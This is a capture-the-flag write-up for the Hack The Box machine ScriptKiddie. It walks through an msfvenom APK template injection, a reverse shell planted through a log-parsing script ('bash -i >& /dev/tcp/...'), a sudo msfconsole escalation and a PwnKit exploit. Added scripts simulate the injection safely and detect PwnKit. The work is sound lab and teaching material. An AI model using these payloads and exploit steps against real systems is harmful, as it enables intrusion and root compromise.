# 🕵 HTB-Writeup : SCRIPTKIDDIE
## Recon
```sh
└─$ rustscan -a 10.10.10.226 -b 10000 -- -A -Pn -sV -T5
.----. .-. .-. .----..---. .----. .---. .--. .-. .-.
| {} }| { } |{ {__ {_ _}{ {__ / ___} / {} \ | `| |
| .-. \| {_} |.-._} } | | .-._} }\ }/ /\ \| |\ |
`-' `-'`-----'`----' `-' `----' `---' `-' `-'`-' `-'
The Modern Day Port Scanner.
Open 10.10.10.226:22
Open 10.10.10.226:5000
PORT STATE SERVICE REASON VERSION
22/tcp open ssh syn-ack OpenSSH 8.2p1 Ubuntu 4ubuntu0.1 (Ubuntu Linux; protocol 2.0)
5000/tcp open http syn-ack Werkzeug httpd 0.16.1 (Python 3.8.5)
| http-methods:
|_ Supported Methods: GET POST HEAD OPTIONS
|_http-title: k1d'5 h4ck3r t00l5
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
```
We are facing a [Werkzeug](https://pypi.org/project/Werkzeug/) web server. On the main page, we have access to 3 tools:
- nmap
- msfvenom
- searchsploit
## Vulnerability
The msfvenom tool can generate Windows, Unix and Android payloads, and accepts an uploaded file as the payload template.
I first used `searchsploit` and found some published vulnerabilities for **Werkzeug**.
```sh
└─$ searchsploit Werkzeug
------------------------------------ ---------------------------------
Exploit Title | Path
------------------------------------ ---------------------------------
Pallets Werkzeug 0.15.4 - Path Trav | python/webapps/50101.py
Werkzeug - 'Debug Shell' Command Ex | multiple/remote/43905.py
Werkzeug - Debug Shell Command Exec | python/remote/37814.rb
------------------------------------ ---------------------------------
```
These exploits need access to the Werkzeug debug *console* page, which is not exposed on this box, so they cannot be used here.
After some research, I found that msfvenom itself is vulnerable to an [APK template command injection](https://nvd.nist.gov/vuln/detail/CVE-2020-7384) (CVE-2020-7384).
I found an [article](https://www.infosecmatter.com/metasploit-module-library/?mm=exploit/unix/fileformat/metasploit_msfvenom_apk_template_cmd_injection) explaining that vulnerability.
msfvenom is vulnerable to command injection when it is used to craft an APK file with the `-x` switch, which tells `msfvenom` to use an existing APK as the template for the Android payload. Data read from the crafted template (its signing certificate details) ends up in a shell command that msfvenom runs without escaping, so whoever runs msfvenom on that template executes the injected command. The web app does exactly that with whatever file we upload.
We can use the `unix/fileformat/metasploit_msfvenom_apk_template_cmd_injection` module to craft such a malicious template.
```sh
msf6 > use unix/fileformat/metasploit_msfvenom_apk_template_cmd_injection
msf6 exploit() > set payload cmd/unix/reverse_bash
payload => cmd/unix/reverse_bash
msf6 exploit() > set lhost 10.10.16.11
msf6 exploit() > exploit
[+] msf.apk stored at /home/pezzz/.msf4/local/msf.apk
```
We can now use it as the template in the web app's msfvenom tool: start a listener on port 4444 (the module's default `lport`), select Android as the target OS, upload `msf.apk` as the template file and generate a payload. When the app runs msfvenom on our template, the injected command executes and we get our first shell as `kid`, which lets us read the user flag.
```sh
└─$ rlwrap nc -lvnp 4444
listening on [any] 4444 ...
connect to [10.10.16.11] from (UNKNOWN) [10.10.10.226] 47136
$ whoami
kid
$ cat /home/kid/user.txt
*************************ec7cb84
```
For a more stable access, we can add our SSH public key to `/home/kid/.ssh/authorized_keys` and log in over SSH.
## Path to the privesc
### Local recon
I first run a [LinPeas](https://github.com/carlospolop/PEASS-ng/tree/master/linPEAS) scan.
```sh
kid@scriptkiddie:~$ ./linpeas.sh -qN > out
# checking sudo version
╔══════════╣ Sudo version
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#sudo-version
Sudo version 1.8.31
╔══════════╣ CVEs Check
Vulnerable to CVE-2021-4034
Vulnerable to CVE-2021-3560
# Checking last connection
╔══════════╣ Last time logon each user
Username Port From Latest
kid < thats me pts/0 10.10.16.11 Sat Sep 3 13:34:17 +0000 2022
pwn pts/1 10.10.14.7 Thu Jan 28 17:52:15 +0000 2021
```
We find two potentially interesting pieces of information.
First, LinPEAS flags the box as vulnerable to **CVE-2021-4034** and **CVE-2021-3560**. Note that both are polkit bugs; they have nothing to do with the sudo version (**1.8.31**) printed just above them. Second, a user `pwn` has logged in interactively before, from *10.10.14.7*. That address is only the source of an earlier session, not something on the target network; the useful part is that `pwn` is an interactive account worth looking at.
---
In **/home/pwn** we find a script:
```sh
#!/bin/bash
log=/home/kid/logs/hackers
cd /home/pwn/
cat $log | cut -d' ' -f3- | sort -u | while read ip; do
sh -c "nmap --top-ports 10 -oN recon/${ip}.nmap ${ip} 2>&1 >/dev/null" &
done
if [[ $(wc -l < $log) -gt 0 ]]; then echo -n > $log; fi
```
The script reads **/home/kid/logs/hackers**, drops the first two space-separated fields of each line, and passes the rest as the IP to an nmap command that is run through `sh -c`, so the value is re-parsed by a shell. It then truncates the log once it has been processed.
I confirmed that we can write in that directory by creating a file with `touch`; it worked.
Since we have write access on **/home/kid/logs/hackers** and the script runs as **pwn**, we can inject arbitrary commands that will be executed with **pwn**'s rights.
### Exploiting vulnerabilities
#### Exploiting *pwn* script
The line we put in **/home/kid/logs/hackers** must respect three things:
* two dummy space-separated fields in front, because `cut -d' ' -f3-` drops them
* a `;` to terminate the nmap command the script builds and start ours
* a `#` at the end to comment out the rest of the line (`.nmap ... >/dev/null`) and avoid errors
So our line will be the following (with our own listener IP and port):
```sh
a b ; bash -c '/bin/bash -i >& /dev/tcp/10.10.16.7/8888 0>&1' #
```
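As an added example (not the writeup's or the box's code), the script below replays what the pwn script does with a single log line, with a stub `nmap` placed on PATH so nothing is actually scanned, and shows the hardened form: validate the field as an IPv4 literal and pass it as one argv element instead of re-parsing it through `sh -c`. It is the same bug class as the msfvenom APK template injection used earlier on this box (untrusted input interpolated into a shell command string). Function names such as `extract_ip` and the `INJECTED` marker are mine.

```shell
#!/bin/bash
# Added example, not code from the box or the writeup: replays what the pwn
# script does with one line of /home/kid/logs/hackers so the payload rules
# above can be checked, with a stub `nmap` on PATH so nothing is scanned.

# What survives `cut -d' ' -f3- | sort -u | while read ip` for one log line.
extract_ip() {
    printf '%s\n' "$1" | cut -d' ' -f3- | sort -u | { read -r ip; printf '%s' "$ip"; }
}

# The exact string the script hands to `sh -c` (copied from its nmap line).
build_cmd() {
    printf '%s' "nmap --top-ports 10 -oN recon/${1}.nmap ${1} 2>&1 >/dev/null"
}

# Execute it the way the script does, but with a no-op `nmap` stub on PATH.
run_as_script_would() {
    local tmp rc
    tmp=$(mktemp -d) || return 1
    printf '#!/bin/sh\nexit 0\n' > "$tmp/nmap" && chmod +x "$tmp/nmap"
    PATH="$tmp:$PATH" sh -c "$(build_cmd "$1")"
    rc=$?
    rm -rf "$tmp"
    return $rc
}

# Hardened variant: only accept a dotted-quad IPv4 literal, and never hand the
# value to a shell for re-parsing (it is one quoted argv element of nmap).
run_safely() {
    local ip=$1
    printf '%s\n' "$ip" | grep -Eq '^([0-9]{1,3}\.){3}[0-9]{1,3}$' || return 1
    nmap --top-ports 10 -oN "recon/$ip.nmap" "$ip" >/dev/null 2>&1 &
}

# Demo: the injected line from above, with a harmless `echo` instead of the
# reverse shell.  Prints INJECTED because `;` ends the nmap command and `#`
# swallows the trailing `.nmap ... >/dev/null`.
line='a b ; echo INJECTED #'
run_as_script_would "$(extract_ip "$line")"
```

Against the real target, just write the crafted line into the log (an `echo` redirected to `/home/kid/logs/hackers` is enough) with the listener already running; because the script truncates the log after each pass, the line vanishing from the file is the sign it was processed.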
And we now have a shell as **pwn**:
```sh
connect to [10.10.16.7] from (UNKNOWN) [10.10.10.226] 54820
bash: cannot set terminal process group (866): Inappropriate ioctl for device
bash: no job control in this shell
pwn@scriptkiddie:~$ id
id
uid=1001(pwn) gid=1001(pwn) groups=1001(pwn)
```
We can see that the user **pwn** can execute msfconsole as root without a password:
```sh
sudo -l
Matching Defaults entries for pwn on scriptkiddie:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User pwn may run the following commands on scriptkiddie:
(root) NOPASSWD: /opt/metasploit-framework-6.0.9/msfconsole
```
The help menu of msfconsole shows that we can obtain a Ruby shell in the current context:
```sh
Developer Commands
==================
Command Description
------- -----------
edit Edit the current module or a file with the preferred editor
irb Open an interactive Ruby shell in the current context
```
From that Ruby shell we can spawn **/bin/bash**, as documented on GTFOBins: https://gtfobins.github.io/gtfobins/irb/
But first we have to upgrade our shell, because msfconsole needs a proper terminal:
```sh
stty: 'standard input': Inappropriate ioctl for device
```
I tried adding my SSH key but I don't have access. Fortunately, a simple `python3 -c 'import pty; pty.spawn("/bin/bash")'` solved the issue.
We can now exploit the sudo rule:
```sh
pwn@scriptkiddie:~$ sudo /opt/metasploit-framework-6.0.9/msfconsole
[...]
msf6 > irb
irb
[*] Starting IRB shell...
[*] You are in the "framework" object
irb: warn: can't alias jobs from irb_jobs.
>> exec '/bin/bash'
root@scriptkiddie:/home/pwn/.ssh# id
id
uid=0(root) gid=0(root) groups=0(root)
```
We can now retrieve the root flag.
#### Exploiting CVEs
I also tried to exploit the two CVEs flagged by LinPEAS.
The first vulnerability (**CVE-2021-4034**, "PwnKit") is a local privilege escalation in polkit's `pkexec` utility, a setuid-root binary that "allows an authorized user to execute PROGRAM as another user". As the PoC's description puts it, "the current version of pkexec doesn't handle the calling parameters count correctly and ends trying to execute environment variables as commands".
Concretely, when pkexec is started with an empty argument list (argc = 0), it reads `argv[1]` past the end of the array, which lands on the first environment variable, and writes a resolved executable path back there. An unprivileged user can use that out-of-bounds write to reintroduce an environment variable that pkexec would otherwise strip (`GCONV_PATH`) and make it load an attacker-controlled shared library as root. [This article](https://blog.qualys.com/vulnerabilities-threat-research/2022/01/25/pwnkit-local-privilege-escalation-vulnerability-discovered-in-polkits-pkexec-cve-2021-4034) explains the vulnerability in detail.
I found an [exploit on GitHub](https://github.com/arthepsy/CVE-2021-4034/blob/main/cve-2021-4034-poc.c) that implements those steps.
```sh
# compiled exploit w/ gcc
kid@scriptkiddie:~$ gcc exploit.c -o exploit
# execute the exploit
kid@scriptkiddie:~$ ./exploit
$ whoami
root
$ cat /root/root.txt
*************************fa68e5c
```
The exploit works! We get a root shell and can read the flag. :)
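As an added triage example (not part of the original writeup): the exploit above needs a setuid `pkexec`, and the Qualys advisory notes that the usual exploitation technique can leave two tell-tale messages in the auth log. The script below checks both; the log lines are constructed for the demo, the message texts are quoted from the advisory, and `/usr/bin/pkexec` is only the default path.

```shell
#!/bin/bash
# Added example, not from the writeup: quick CVE-2021-4034 triage on a host.
# (1) is pkexec still setuid (the precondition for the exploit),
# (2) do the auth logs contain the messages a PwnKit attempt can leave behind.
# The sample log lines are constructed for this demo.

# Return 0 if the file at $1 has the setuid bit set.  The common stopgap
# mitigation is `chmod 0755 /usr/bin/pkexec`, which makes this return 1.
pkexec_is_setuid() {
    [ -u "$1" ]
}

# Count log lines that look like a PwnKit attempt.  The two messages are the
# ones the advisory reports; exact wording can differ between polkit builds,
# so treat this as a starting point rather than a hard signature.
count_pwnkit_hits() {
    grep -cE 'pkexec.*(The value for the SHELL variable was not found|contains suspicious content)' "$1" || true
}

# Write a constructed auth log (one sshd line, one benign pkexec run, two
# suspicious pkexec lines) and print its path.
write_sample_log() {
    local f
    f=$(mktemp) || return 1
    cat > "$f" <<'EOF'
Jan 28 17:52:15 scriptkiddie sshd[866]: Accepted publickey for pwn from 10.10.14.7 port 51234 ssh2
Jan 28 17:53:01 scriptkiddie pkexec[1234]: kid: Executing command [USER=root] [TTY=unknown] [CWD=/home/kid] [COMMAND=/usr/bin/id]
Jan 28 17:55:10 scriptkiddie pkexec[1301]: pkexec[1301]: The value for the SHELL variable was not found the /etc/shells file [USER=root] [TTY=unknown] [CWD=/home/kid] [COMMAND=GCONV_PATH=./pwnkit]
Jan 28 17:55:12 scriptkiddie pkexec[1302]: pkexec[1302]: The value for environment variable [PATH] contains suspicious content [USER=root] [TTY=unknown] [CWD=/home/kid] [COMMAND=GCONV_PATH=./pwnkit]
EOF
    printf '%s' "$f"
}

# Demo run: report on the host's pkexec (path assumed) and scan the sample log.
if pkexec_is_setuid /usr/bin/pkexec; then
    echo "/usr/bin/pkexec is setuid: CVE-2021-4034 precondition present"
else
    echo "/usr/bin/pkexec is missing or not setuid"
fi
sample=$(write_sample_log)
echo "suspicious pkexec log lines: $(count_pwnkit_hits "$sample")"
rm -f "$sample"
```

On a real host, point `count_pwnkit_hits` at `/var/log/auth.log` (or `journalctl -t pkexec` output saved to a file); the advisory also notes that a quieter variant of the exploit exists, so a clean log does not prove the box was not exploited.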
## Tags
Easy, Internal, Use Of Injection Attacks, Metasploit, Ruby, Penetration Tester Level 1, OS Command Injection, Access Control, Backdoor, Public Vulnerabilities, CVE Exploitation, Sudo Exploitation, Security Tools, Weak Permissions